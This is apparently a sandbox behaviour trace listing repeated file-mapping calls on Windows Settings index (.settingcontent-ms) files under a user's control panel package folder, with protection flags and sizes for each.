Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkDialup.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkDialup.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkDirectAccess.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkDirectAccess.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkEthernet.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkEthernet.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkProxy.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkProxy.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkVPN.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkVPN.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkWiFi.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkWiFi.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkWorkplace.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkWorkplace.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemBluetooth.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemBluetooth.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDevices.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDevices.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDisplay.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDisplay.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemInfo.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemInfo.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemShellMode.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemShellMode.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCalendar.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCalendar.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCallHistory.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCallHistory.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyContacts.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyContacts.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyEmail.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyEmail.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyGeneral.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyGeneral.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyLocation.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyLocation.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyMessaging.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyMessaging.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyMicrophone.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyMicrophone.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyMotionData.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyMotionData.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyPersonalization.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyPersonalization.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyRadios.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyRadios.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyWebcam.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyWebcam.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreMusUpdate.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreMusUpdate.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreOneBackup.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreOneBackup.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreRestore.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreRestore.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageSpeech.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageSpeech.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageStart.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageStart.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageThemes.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageThemes.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageTimeRegionDateTime.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageTimeRegionDateTime.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageTimeRegionLanguage.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageTimeRegionLanguage.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageTimeRegionSpelling.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageTimeRegionSpelling.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageWindowsDefender.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageWindowsDefender.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Settings_DeveloperModeGroup.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Settings_DeveloperModeGroup.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2192 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2176 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2160 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2144 True 1
Fn
